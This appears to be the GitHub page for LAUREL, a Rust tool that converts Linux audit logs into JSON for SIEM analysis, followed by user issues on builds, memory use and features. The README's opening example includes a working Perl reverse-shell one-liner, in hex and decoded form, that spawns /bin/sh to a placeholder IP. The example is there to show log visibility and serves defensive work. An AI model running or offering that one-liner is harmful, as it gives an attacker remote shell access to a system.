Transform Linux Audit logs for SIEM usage

Overview

Linux Audit – Usable, Robust, Easy Logging

TLDR: Instead of audit events that look like this…

type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…

…turn them into JSON logs where the mess that your pen testers/red teamers/attackers are trying to make becomes apparent at first glance:

{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}

At the source.

Description

Logs produced by the Linux Audit subsystem and auditd(8) contain information that can be very useful in a SIEM context (if a useful rule set has been configured). However, the format is not well-suited for at-scale analysis: Events are usually split across different lines that have to be merged using a message identifier. Files and program executions are logged via PATH and EXECVE elements, but a limited character set for strings causes many of those entries to be hex-encoded. For a more detailed discussion, see Practical auditd(8) problems.

LAUREL solves these problems by consuming audit events, parsing and transforming them into more data and writing them out as a JSON-based log format, while keeping all information intact that was part of the original audit log. It does not replace auditd(8) as the consumer of audit messages from the kernel. Instead, it uses the audisp ("audit dispatch") interface to receive messages via auditd(8). Therefore, it can peacefully coexist with other consumers of audit events (e.g. some EDR products).

Refer to JSON-based log format for a description of the log format.

We developed this tool because we were not content with feature sets and performance characteristics of existing projects and products. Please refer to Performance for details.

Build from source…

LAUREL is written in Rust. To build it, a reasonably recent Rust compiler (we currently use 1.48), cargo, and the libacl library and its header files (Debian: libacl1-dev, RedHat: libacl-devel) are required.

$ cargo build --release
$ sudo install -m755 target/release/laurel /usr/local/sbin/laurel

…or use the provided binary

Static Linux/x86_64 binaries are built for tagged releases.

Configure, use

  • Create a dedicated user, e.g.:
    $ sudo useradd --system --home-dir /var/log/laurel --create-home _laurel
  • Configure LAUREL: Copy the provided annotated example to /etc/laurel/config.toml and customize it.
  • Register LAUREL as an audisp plugin: Copy the provided example to /etc/audisp/plugins.d/laurel.conf or /etc/audit/plugins.d/laurel.conf (depending on your auditd version).
  • Tell auditd(8) to re-evaluate its configuration
    $ sudo pkill -HUP auditd

License

GNU General Public License, version 3

Authors

Comments
  • Issues installing on C7

    Issues installing on C7

    Any ideas?

    cargo build --release Compiling laurel v0.4.0 (/opt/laurel) error: failed to run custom build command for laurel v0.4.0 (/opt/laurel)

    Caused by: process didn't exit successfully: /opt/laurel/target/release/build/laurel-8d418fa9b5624d53/build-script-build (exit status: 101) --- stderr /usr/include/netinet/in.h:32:8: error: redefinition of 'in_addr' /usr/include/linux/in.h:84:8: note: previous definition is here /usr/include/bits/in.h:155:8: error: redefinition of 'ip_mreqn' /usr/include/linux/in.h:171:8: note: previous definition is here /usr/include/bits/in.h:163:8: error: redefinition of 'in_pktinfo' /usr/include/linux/in.h:220:8: note: previous definition is here /usr/include/netinet/in.h:43:5: error: redefinition of enumerator 'IPPROTO_IP' /usr/include/linux/in.h:28:3: note: previous definition is here /usr/include/netinet/in.h:45:5: error: redefinition of enumerator 'IPPROTO_ICMP' /usr/include/linux/in.h:30:3: note: previous definition is here /usr/include/netinet/in.h:47:5: error: redefinition of enumerator 'IPPROTO_IGMP' /usr/include/linux/in.h:32:3: note: previous definition is here /usr/include/netinet/in.h:49:5: error: redefinition of enumerator 'IPPROTO_IPIP' /usr/include/linux/in.h:34:3: note: previous definition is here /usr/include/netinet/in.h:51:5: error: redefinition of enumerator 'IPPROTO_TCP' /usr/include/linux/in.h:36:3: note: previous definition is here /usr/include/netinet/in.h:53:5: error: redefinition of enumerator 'IPPROTO_EGP' /usr/include/linux/in.h:38:3: note: previous definition is here /usr/include/netinet/in.h:55:5: error: redefinition of enumerator 'IPPROTO_PUP' /usr/include/linux/in.h:40:3: note: previous definition is here /usr/include/netinet/in.h:57:5: error: redefinition of enumerator 'IPPROTO_UDP' /usr/include/linux/in.h:42:3: note: previous definition is here /usr/include/netinet/in.h:59:5: error: redefinition of enumerator 'IPPROTO_IDP' /usr/include/linux/in.h:44:3: note: previous definition is here /usr/include/netinet/in.h:61:5: error: redefinition of enumerator 'IPPROTO_TP' /usr/include/linux/in.h:46:3: note: previous definition is here /usr/include/netinet/in.h:63:5: error: redefinition of enumerator 'IPPROTO_DCCP' /usr/include/linux/in.h:48:3: note: previous definition is here /usr/include/netinet/in.h:65:5: error: redefinition of enumerator 'IPPROTO_IPV6' /usr/include/linux/in.h:50:3: note: previous definition is here /usr/include/netinet/in.h:67:5: error: redefinition of enumerator 'IPPROTO_RSVP' /usr/include/linux/in.h:52:3: note: previous definition is here /usr/include/netinet/in.h:69:5: error: redefinition of enumerator 'IPPROTO_GRE' /usr/include/linux/in.h:54:3: note: previous definition is here /usr/include/netinet/in.h:71:5: error: redefinition of enumerator 'IPPROTO_ESP' /usr/include/linux/in.h:56:3: note: previous definition is here /usr/include/netinet/in.h:73:5: error: redefinition of enumerator 'IPPROTO_AH' /usr/include/linux/in.h:58:3: note: previous definition is here fatal error: too many errors emitted, stopping now [-ferror-limit=] /usr/include/netinet/in.h:32:8: error: redefinition of 'in_addr', err: true /usr/include/bits/in.h:155:8: error: redefinition of 'ip_mreqn', err: true /usr/include/bits/in.h:163:8: error: redefinition of 'in_pktinfo', err: true /usr/include/netinet/in.h:43:5: error: redefinition of enumerator 'IPPROTO_IP', err: true /usr/include/netinet/in.h:45:5: error: redefinition of enumerator 'IPPROTO_ICMP', err: true /usr/include/netinet/in.h:47:5: error: redefinition of enumerator 'IPPROTO_IGMP', err: true /usr/include/netinet/in.h:49:5: error: redefinition of enumerator 'IPPROTO_IPIP', err: true /usr/include/netinet/in.h:51:5: error: redefinition of enumerator 'IPPROTO_TCP', err: true /usr/include/netinet/in.h:53:5: error: redefinition of enumerator 'IPPROTO_EGP', err: true /usr/include/netinet/in.h:55:5: error: redefinition of enumerator 'IPPROTO_PUP', err: true /usr/include/netinet/in.h:57:5: error: redefinition of enumerator 'IPPROTO_UDP', err: true /usr/include/netinet/in.h:59:5: error: redefinition of enumerator 'IPPROTO_IDP', err: true /usr/include/netinet/in.h:61:5: error: redefinition of enumerator 'IPPROTO_TP', err: true /usr/include/netinet/in.h:63:5: error: redefinition of enumerator 'IPPROTO_DCCP', err: true /usr/include/netinet/in.h:65:5: error: redefinition of enumerator 'IPPROTO_IPV6', err: true /usr/include/netinet/in.h:67:5: error: redefinition of enumerator 'IPPROTO_RSVP', err: true /usr/include/netinet/in.h:69:5: error: redefinition of enumerator 'IPPROTO_GRE', err: true /usr/include/netinet/in.h:71:5: error: redefinition of enumerator 'IPPROTO_ESP', err: true /usr/include/netinet/in.h:73:5: error: redefinition of enumerator 'IPPROTO_AH', err: true fatal error: too many errors emitted, stopping now [-ferror-limit=], err: true thread 'main' panicked at 'unable to generate bindings: ()', build.rs:114:10 note: run with RUST_BACKTRACE=1 environment variable to display a backtrace

    opened by 100110010111 14
  • Laurel 0.3.1 seems to have a memory leak.

    Laurel 0.3.1 seems to have a memory leak.

    On testing out Laurel v0.3.1 on a Debian Bullseye Node with a 5.15.32 kernel, noticed a pretty significant upward curve in memory usage which keeps on incrementing without stabilizing, and seems indicative of a memory leak.

    On running laurel with Valgrind, it flags some memory as being possibly lost.

    ==1524972== LEAK SUMMARY:
    ==1524972==    definitely lost: 0 bytes in 0 blocks
    ==1524972==    indirectly lost: 0 bytes in 0 blocks
    ==1524972==      possibly lost: 318 bytes in 7 blocks
    ==1524972==    still reachable: 298,337 bytes in 2,601 blocks
    ==1524972==         suppressed: 0 bytes in 0 blocks
    

    From the Valgrind documentation:

    Possibly lost". This means that a chain of one or more pointers to the block has been found, but at least one of the pointers is an interior-pointer. This could just be a random value in memory that happens to point into a block, and so you shouldn't consider this ok unless you know you have interior-pointers.

    This seems to suggest that there is some memory that is not being freed accordingly.

    The CPU although increased after registering laurel as an auditd plugin, did stabilize soon after. But the memory just keeps on shooting up. Have also attached a few screenshots depicting the memory increase via Prometheus Metrics.

    Screen Shot 2022-05-06 at 1 08 44 PM

    Laurel was deployed as an auditd plugin on 04/27/2022 in the above screenshot.

    Screen Shot 2022-05-06 at 1 15 20 PM

    On another machine, the memory aggressively shoots up within a few seconds.

    Would like to hear any comments/opinions on this.

    opened by adduali1310 13
  • Processing remotely generated audit events received from au-remote

    Processing remotely generated audit events received from au-remote

    Heya folks,

    Is there anything stopping laurel from processing audit logs sent to another server via au-remote? i.e. do audisp plugins require explicit support for remote audit logs, or should it not matter and "just work".

    Auditd supports running audisp plugins against remotely received logs using the dispatch_network = yes config item. I've tested this setting and have gotten it to work with the syslog plugin that ships with Centos, so at least audisp plugins can process logs from remote sources.

    Try as I might, I can't seem to get laurel to write out the remote logs; though the locally generated events are working.

    Great project by the way, love your work!

    opened by jordaneyres 12
  • Let's consider dealing more gracefully with missing EOEs

    Let's consider dealing more gracefully with missing EOEs

    I suppose we could deal with missing end-of-event messages (see #14) more gracefully by changing Coalesce::process_line to enqueue objects instead of returning them.

    opened by hillu 11
  • Laurel dont run with non local users

    Laurel dont run with non local users

    We need to run laurel on systems where local users cant be created. Laurel seems to check /etc/passwd for users defined in config.toml with user= and read-users=. If both (in our case) or one of this users are AD users laurel will not start:

    Jul 01 14:40:20 <hostname> /DATA/auditd/bin/laurel[129859]: user xxxxauditd not found

    Can support for non-local users be implemented?

    # id xxxxauditd
    uid=30019(xxxxauditd) gid=4305(xxx) groups=4305(xxx),4550(nopass01)
    # id xxxxsplunk
    uid=25581(xxxxsplunk) gid=4305(xxx) groups=4305(xxx),1290(suapache)
    
    opened by sraue 9
  • Consider using Nom for parsing

    Consider using Nom for parsing

    I'm opening this issue in the spirit of a discussion. I'm far from an expert (or even a novice really) with parsing, but I'll give you my reason for asking: I was hoping to contribute to laurel and (specifically int the parser) and went to learn how peg works. I couldn't find a single tutorial. Obviously you guys learned peg to write the code, but I found a huge wealth of material on nom and it seems like a much more widely used and embraced parsing library. I realize this is a bit of a holy war, but for security software, especially parsers, I wonder if using a more widely found library might be considered. (I also find nom code - which is not macros) much easier to read and understand. Would this change be something you'd consider if somebody contributed it?

    opened by zmackie 9
  • Request to provide a library crate if possible

    Request to provide a library crate if possible

    Thank you for this useful project.

    I am wondering if it will be possible for you to provide a library crate so that other projects can use laurel features. This way we don't have to re-invent the wheel and depend on laurel as upstream.

    Use case I am looking at: Instead of logging into a file, push to a redis instance or some other queue for processing in a different way.

    opened by kushaldas 9
  • Add support for rsyslog lumberjack mechanism

    Add support for rsyslog lumberjack mechanism

    Hi! Thanks for this software!

    I am opening this PR to add a functionality I am interested in to better integrate the auditd machinery together with rsyslog. The juice of the feature regards the ability for rsyslog to be able to recognize the beginning of a json structure in a log line. This is achieved prepending a cookie (@cee:) before the log line. In the case of laurel as an auditd plugin, this means that such cookie should be present at the beginning of each line. I thought first of implementing a custom serde serializer, but this is impossible as a serializer has no notion of level and cannot tell when an object is at the beginning of a line. The approach I took here is to use a custom Writer (an implementation of std::io::Write) that mimics a BufWriter, buffering in an internal buffer per line instead of using the byte size as measure. To enable this mechanism, I added a new section in the configuration file, with a single boolean option

    [out_format]
    
    lumberjack = true
    

    that defaults to false (the current behavior).

    You will notice that there are A LOT of lines in the PR diff. This is because I use (neo)vim and rust-analyzer in the language server machinery. It is not feasible for me to work without it and this machinery autoformats the code at each save. I run cargo fmt on the whole code base and saved it as first commit. The remaining commits in the PR implement what I described above. I beg you to accept this not as a disrespectful act, but rather as a way for you and me to foster public collaboration :innocent:

    opened by leophys 8
  • Error when executing /usr/local/sbin/laurel after build/install

    Error when executing /usr/local/sbin/laurel after build/install

    After the build/install of laurel on CentOS Linux release 8.4.2105 (/etc/redhat-release), following the instructions, and without encountering any particular problem, the executable doesn't work : /usr/local/sbin/laurel --config /etc/laurel/config.toml => /usr/local/sbin/laurel: fatal error 'called Option::unwrap() on a None value' at src/file_handling.rs:63,14

    opened by hashbdev 8
  • Key filter

    Key filter

    This PR should implement the feature to use key based filtering of auditd events. Specifying keys in laurel.conf:

    [filter] filter-keys = ["filter-this"]

    #24 Currently it only drops the whole message

    Looking forward for your feedback

    opened by Hu6li 7
  • Add option to replace UNIX epoch with ISO timestamp in log output

    Add option to replace UNIX epoch with ISO timestamp in log output

    This request is focused primarily on using Splunk as the target SIEM.

    Splunk's time-series index files (TSIDX) create maps of "words" or segments to their frequency in the logs their associated with. The use of UNIX epoch time stamps creates a 1:1 mapping with the EventID's timestamp: each epoch value occurs (usually) only once. This will, with busy systems, create what are colloquially known as TSIDX explosions where the .tsidx files grow larger than the raw log data they correspond to.

    To prevent this behaviour, it is recommended to use ISO timestamps (instead of UNIX epoch) values as their segmented components will occur more frequently, thus reducing the number of unique TSIDX entries.

    As this request may not be useful for all scenarios, it can be something optionally enabled within the config.toml file.

    Example event (expanded with jq):

    {
     "ID": "199",
     "_time": "2022-08-07T17:39:25-0000",
     "SERVICE_STOP": {
       "pid": 1,
       "uid": 0,
       "auid": 4294967295,
       "ses": 4294967295,
       "subj": "system_u:system_r:init_t:s0",
       "msg": "unit=dnf-makecache comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success",
       "UID": "root",
       "AUID": "unset"
     }
    }
    
    question 
    opened by yorokobi 7
  • Label processes based on a regexp over ARGV

    Label processes based on a regexp over ARGV

    I have been asked about using the proceess labeling feature based on not only the executable but on the argument list.

    I currently see practical implementation problems with this: The regexp engine from the regex crate has the nice feature of providing a multi-pattern matcher. However, it can only work on fixed buffers, not on input streams that are constructed as they are fed to the matcher. So we'd have to copy every argument list before matching, resulting in (I fear) considerable CPU and memory overhead even before the matcher gets to run. I am not aware of an alternative regexp implementation that could be used instead.

    This issue needs some more thinking about.

    Concrete use-cases of process invocations would certainly be useful, please add them in the comments.

    enhancement help wanted 
    opened by hillu 0
  • Scripts and binaries

    Scripts and binaries

    From observation: Executing scripts (using a #! line) produces a slightly different set of event records than executing an ELF binary:

    When running scripts, SYSCALL.exe contains the interpreter (/bin/bash, /bin/sh, /usr/bin/perl, etc.), but the first PATH.name contains the script that has been invoked through execve.

    When running ELF executables (no matter whether they are statically or dynamically linked), SYSCALL.exe and the first PATH.name are equal.

    I assume that a simple string compare between SYSCALL.exe and PATH[0].name cna be used to determine whether a binary or a script is being run. (This needs to be verified, probably using Linux kernel sources.) If this is true, it could be used to log the script name and possibly set labels based on the script name.

    opened by hillu 1
  • Log uid_map

    Log uid_map

    go-audit enriches its event with a uid_map table, so container's inside view of the user_namespace can be seen, cf. #98.

    Not quite sure how to implemen this yet.

    opened by hillu 0
  • Add name-based information to container info

    Add name-based information to container info

    The following bits of information require talking to a container runtime. They require #97 to be resolved.

    • image
    • name
    • pod_uid
    • pod_name
    • pod_namespace
    opened by hillu 0
  • LAUREL should not output resolved *uid, *gid if *UID, *GID are already in the input data.

    LAUREL should not output resolved *uid, *gid if *UID, *GID are already in the input data.

    If auditd has been configured with log_format=ENRICHED, LAUREL should not repeat the work already done, even if translate.user-db has been set to true.

    We want the same behavior as for SYSCALL.ARCH and SYSCALL.SYSCALL.

    opened by hillu 0
  • Provide commandline-field from /proc for every kind of syscall

    Provide commandline-field from /proc for every kind of syscall

    The suggestion is to provide a commandline-field, filled from /proc, for every kind of syscall event. At the moment Laurel provides the PPID-commandline via PARENT_INFO.ARGV for every syscall, while SYSCALL.ARGV only contains the PID-commandline for EXECVE-syscalls.

    Considering queries/detections that use any other type of syscall, including open() for file access watches from auditd.rules, a particular Laurel event provides the PPID- but not the PID-commandline (except execve() of course). This calls for a join-operation by PID, only to get the commandline args.


    We want to add another SYSCALL.ARGV, but there's already one there :)

    At the moment there is

    • SYSCALL.ARGV, which uses decoded and concatenated a0, a1, ... values from Auditd's type=SYSCALL records and PARENT_INFO.ARGV, which uses /proc/$PPID/cmdline

    The latter looks the same for execve-syscalls, but the sources of information differ, although "ARGV" suggests something different. This becomes more obvious for other syscalls like socket, where SYSCALL.ARGV contains hex values. I think this would be a good chance to eliminate this inconsistency.


    I suggest renaming PARENT_INFO.ARGV ---> PARENT_INFO.CMD. For the implementation of the PID-commandline we can add SYSCALL.CMD (or whatever). Reasoning:

    • ARGV still makes sense for syscalls of any kind and should be always enriched to a list. It still has added value whether it's execve() or any other syscall.
    • Messing with PARENT_INFO, instead of SYSCALL breaks less existing detection rules. The biggest pain has been EXECVE params and their encoding. Imho, people rely more on the latter than on PARENT_INFO.

    I am a little unsure whether the encoding/concat stuff for EXECVE still makes sense. It's basically the same info, twice. Should this still remain? I think it would make sense to let SYSCALL.ARGV live, but only as a concatenated list. Save the encoding-part in EXECVE for performance reasons. The downside: we should make commandline-field from /proc entirely optional. This makes sense for uses cases like https://github.com/threathunters-io/laurel/issues/33 and "I just don't need it"-scenarios. Than current Laurel-processing of type=EXECVE records becomes necessary.


    The summary for discussion

    1. Add commandline from /proc/$PID/cmdline for every syscall.
    2. Rename PARENT_INFO.ARGV ---> PARENT_INFO.CMD instead of messing with SYSCALL.ARGV
    3. CMD, COMMANDLINE or something else? CommandLine would help for Sysmon-compat, but it doesn't fit into Laurel's ALLCAPS-field for added respectively enriched fields. Imho, CMD.
    4. Should ARGV encoding/enrichment stay alive in the original form?
    5. Make all of the discussed points configurable, including execve-argv = [ "array", "string", "none" ]
    opened by disasmwinnie 1
Releases(v0.5.1-pre1)
Owner
null
📊 Fetch & monitor your server's resource usage through Lua

?? gmsv_serverstat Simple serverside binary module which can expose information about system resource usage to Lua. Installation Download the relevant

William 21 Jul 30, 2022
Linux Kernel Manager and Activity Monitor 🐧💻

Linux Kernel Manager and Activity Monitor ?? ?? The kernel is the part of the operating system that facilitates interactions between hardware and soft

Orhun Parmaksız 1.7k Jan 5, 2023
Untrusted IPC with maximum performance and minimum latency. On Rust, on Linux.

Untrusted IPC with maximum performance and minimum latency. On Rust, on Linux. When is this Rust crate useful? Performance or latency is crucial, and

null 72 Jan 3, 2023
Everyday-use client-side map-aware Arch Linux mirror ranking tool

Rate Arch Mirrors This is a tool, which fetches mirrors, skips outdated/syncing Arch Linux mirrors, then uses info about submarine cables and internet

Nikita Almakov 196 Jan 2, 2023
MILD - Minimal Install Linux Desktop

MILD - Minimal Install Linux Desktop MILD is a simple and straightforward text-mode installer that aims to install a "D.E."(Desktop Environment) with

Pedro Rosendo 3 Jul 23, 2022
SWC Transform to prefix logs. Useful for adding file and line number to logs

SWC Transform to prefix logs. Useful for adding file and line number to logs

William Tetlow 12 Jan 1, 2023
Easy c̵̰͠r̵̛̠ö̴̪s̶̩̒s̵̭̀-t̶̲͝h̶̯̚r̵̺͐e̷̖̽ḁ̴̍d̶̖̔ ȓ̵͙ė̶͎ḟ̴͙e̸̖͛r̶̖͗ë̶̱́ṉ̵̒ĉ̷̥e̷͚̍ s̷̹͌h̷̲̉a̵̭͋r̷̫̊ḭ̵̊n̷̬͂g̵̦̃ f̶̻̊ơ̵̜ṟ̸̈́ R̵̞̋ù̵̺s̷̖̅ţ̸͗!̸̼͋

Rust S̵̓i̸̓n̵̉ I̴n̴f̶e̸r̵n̷a̴l mutability! Howdy, friendly Rust developer! Ever had a value get m̵̯̅ð̶͊v̴̮̾ê̴̼͘d away right under your nose just when

null 294 Dec 23, 2022
A utility like pkg-audit for Arch Linux. Based on Arch Security Team data.

arch-audit pkg-audit-like utility for Arch Linux. Based on data from security.archlinux.org collected by the awesome Arch Security Team. Installation

Andrea Scarpino 316 Nov 22, 2022
A utility like pkg-audit for Arch Linux. Based on Arch Security Team data.

arch-audit pkg-audit-like utility for Arch Linux. Based on data from security.archlinux.org collected by the awesome Arch Security Team. Installation

Andrea Scarpino 316 Nov 22, 2022
dua (-> Disk Usage Analyzer) is a tool to conveniently learn about the usage of disk space of a given directory

dua (-> Disk Usage Analyzer) is a tool to conveniently learn about the usage of disk space of a given directory. It's parallel by default and will max

Sebastian Thiel 1.8k Jan 2, 2023
Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps. 👻🐚

moonwalk Cover your tracks during Linux Exploitation / Penetration Testing by leaving zero traces on system logs and filesystem timestamps. ?? Table o

Mufeed VH 1.1k Jan 6, 2023
Tool for audit and reclaim of delegated SPL Token accounts

Usage Install prerequisites System development libraries sudo apt install libssl-dev libudev-dev pkg-config gcc Rust curl --proto '=https' --tlsv1.2

Solana Foundation 4 Jan 27, 2022
Audit Cargo.lock files for dependencies with security vulnerabilities

RustSec Crates ?? ??️ ?? The RustSec Advisory Database is a repository of security advisories filed against Rust crates published via crates.io. The a

RustSec 1.2k Dec 30, 2022
Audit Cargo.lock files for dependencies with security vulnerabilities

RustSec Crates ?? ??️ ?? The RustSec Advisory Database is a repository of security advisories filed against Rust crates published via crates.io. The a

RustSec 1.2k Jan 5, 2023
Scan the symbols of all ELF binaries in all Arch Linux packages for usage of malloc_usable_size

Scan the symbols of all ELF binaries in all Arch Linux packages for usage of malloc_usable_size (-D_FORTIFY_SOURCE=3 compatibility)

null 3 Sep 9, 2023
Utility that takes logs from anywhere and sends them to Telegram.

logram Utility that takes logs from anywhere and sends them to Telegram. Supports log collection from files, journald and docker containers. More abou

Max Eliseev 85 Dec 22, 2022
Parses go-ethereum logs and pipes them to telegram

parrot Middleware that accepts logs via stdin and redirects them to Telegram, based on a configurable set of conditions.

null 6 Jul 25, 2022
Rapidly Search and Hunt through Windows Event Logs

Rapidly Search and Hunt through Windows Event Logs Chainsaw provides a powerful ‘first-response’ capability to quickly identify threats within Windows

F-Secure Countercept 1.8k Dec 31, 2022
Command-line program to manage PS battle logs. WIP.

psbattletools psbattletools is a command-line tool written in Rust for manipulating Pokémon Showdown battle logs. Installation psbattletools currently

Annika 2 Dec 27, 2022
suidsnoop is a tool based on eBPF LSM programs that logs whenever a suid binary is executed and implements custom allow/deny lists.

suidsnoop Log suid binaries and enforce per-uid suid policy. suidsnoop is a tool for logging whenever a suid binary is executed on your system and opt

William Findlay 11 Dec 22, 2022